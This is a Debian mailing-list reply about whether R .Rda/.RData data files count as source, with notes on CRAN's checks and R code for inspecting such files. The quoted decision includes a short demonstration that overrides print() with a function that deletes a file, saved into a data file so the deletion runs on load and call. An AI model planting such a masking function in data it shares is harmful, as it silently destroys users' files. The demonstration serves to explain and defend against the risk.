
Re: Decision on R datasets



Joerg Jaspert <joerg <at> debian.org> writes:
> it came to our attention[0] that most R packages ship data files (*.Rda,
> *.Rdata), which can contain a lot of different kind of data, from
> command line instructions, to huge data tables, or even extra modules
> loaded by means of install.packages() function.
> 
> It is common practice for R packages to fully document the content of
> the data files in .Rd files shipped in the source tarball[1], so it
> becomes easier to determine which kind of information those data files
> provide.

As this may not be common knowledge among Debian developers, I would also
like to point out that the CRAN network [the package mirrors for R,
containing more than 4800 source packages, and having ~200 global mirrors]
does extensive checks on incoming new packages which are very much in line
with Debian's views.  PDF vignettes need to be rebuildable from source, data
sets must be documented, etc.

CRAN does very extensive checks on incoming packages (and sometimes gets
some heat from the R community over the process; see recent r-devel email
threads).

I think it is worthwhile to point this out. Debian is not the only 
organization taking this issue very seriously.

> Data files can contain modules loaded at runtime, for which we do not
> usually have corresponding source code shipped in the package (or even

I've been around R as a user/contributor/author for maybe 15 years, and
I'd say that this is _extremely_ rare. Mostly these are in fact just data
structures, possibly nested.  Saving your session in RData format for
redistribution is not common practice. RData / rda files almost always
contain data.

And they are generally documented, and often available from source. Eg the 
r-base-core package ['package' in the Debian sense] contains a package 
['package' in the R sense, something loaded by library()] called datasets
with multiple data files. For efficiency these are packaged together, but 
the source tarball has them as code, often as a structure.  [ You can 
always call dput() on an R object and it will print an ascii 
representation.]
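
As a minimal sketch of that round trip (the object and file names below are
made up for illustration and do not come from any package), dput() writes
the text form and dget() reads it back:

```r
# A small example object; 'measurements' is a hypothetical name.
measurements <- data.frame(id = 1:3, value = c(0.5, 1.25, 2))

# Write the ASCII representation to a text file, then read it back.
src_file <- tempfile(fileext = ".R")
dput(measurements, file = src_file)
restored <- dget(src_file)

# The round trip should give back an equivalent object.
roundtrip_ok <- isTRUE(all.equal(measurements, restored))
```

The text file written by dput() is ordinary R code, so it can be read and
diffed like any other source file.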

On the other hand, some packages contain files in .rda (or .RData) format
in their sources. An example is tseries (aka r-cran-tseries), which
switched to .rda when R started to mandate / recommend / prefer this more
compact representation. All .rda files do have corresponding help pages 
with source information but do not have 

> anywhere, if it was modified and saved without keeping the source file),
> or can contain malicious code as well. This is a very extreme corner
> case, but you cannot know it in advance.

Again, I think that is rare.
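
For anyone who wants to check a given file, here is a rough sketch of one
way to look inside it without touching the global workspace. It assumes the
file is loaded into a scratch environment; the demo file and all object
names are hypothetical, and the check only looks at top-level objects:

```r
# Build a demo file holding one data object and one function.
# All names here are hypothetical.
demo_file <- tempfile(fileext = ".rda")
local({
  heights <- c(1.62, 1.75, 1.81)
  print <- function(...) invisible(NULL)  # stand-in for a masking function
  save(heights, print, file = demo_file)
})

# Load into a scratch environment rather than the global workspace,
# so nothing in the file can mask existing objects there.
scratch <- new.env()
loaded <- load(demo_file, envir = scratch)

# Flag every top-level object that is a function rather than plain data.
is_fun <- vapply(loaded,
                 function(nm) is.function(get(nm, envir = scratch)),
                 logical(1))
suspicious <- loaded[is_fun]
```

Here suspicious holds the names of the objects that are functions. This is
only a first pass: it would not catch functions nested inside lists.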
 
> This is an example of a R library without source code:
> 
> > install.packages("sig")

Not part of Debian though, ie one of the 4600-ish packages on CRAN but not
in Debian (we have maybe 200 or so).

> [snip]
> > library("sig")
> > save(sig, file="mydata")
> >
> 
> When users load the data file, they have a sourceless library in their
> environment:
> 
> > before <- loadedNamespaces()
> > load("mydata")
> > setdiff(loadedNamespaces(), before)
> [1] "sig"
> >
> 
> This is an example of malicious code:
> 
> > old_print <- print
> > print <- function(...)
> + {
> + unlink('the_most_important_file.txt')
> + old_print('Say goodbye to your file!')
> + }
> > save.image("mydata")
> >
> 
> When users load the data file, and try to execute a simple print
> statement, they can have their files removed:
> 
> > load("mydata")
> > list.files()
> [1] "mydata"                      "the_most_important_file.txt"
> > print('Hello world!')
> [1] "Say goodbye to your file!"
> > list.files()
> [1] "mydata"
> 
> This just shows that there exist cases where .Rda files are *not* the
> prefered form of modification, such as placing code (or even whole
> libraries) into *.Rda files to be loaded.
> 
> Therefore, we shall consider these data files as preferred form of
> modification if the data was captured in this format from a scientific
> instrument, created manually and painstakingly by hand (this is not the
> common case), or otherwise not generated. If the data was generated, or
> converted by a script or series of scripts, the .Rda file is likely not
> the prefered form, and needs to be rebuilt at build-time from source (as
> we do with any binary in the archive).

I am very grateful that this discussion and decision did not lead to a
'worst case' of outright rejection.  If you would like more information,
or would like to talk to some (very Debian aware) folks at R Core (who are
in your timezone), just shoot me an email off-list and I would be delighted
to make an introduction.

Regards,  Dirk

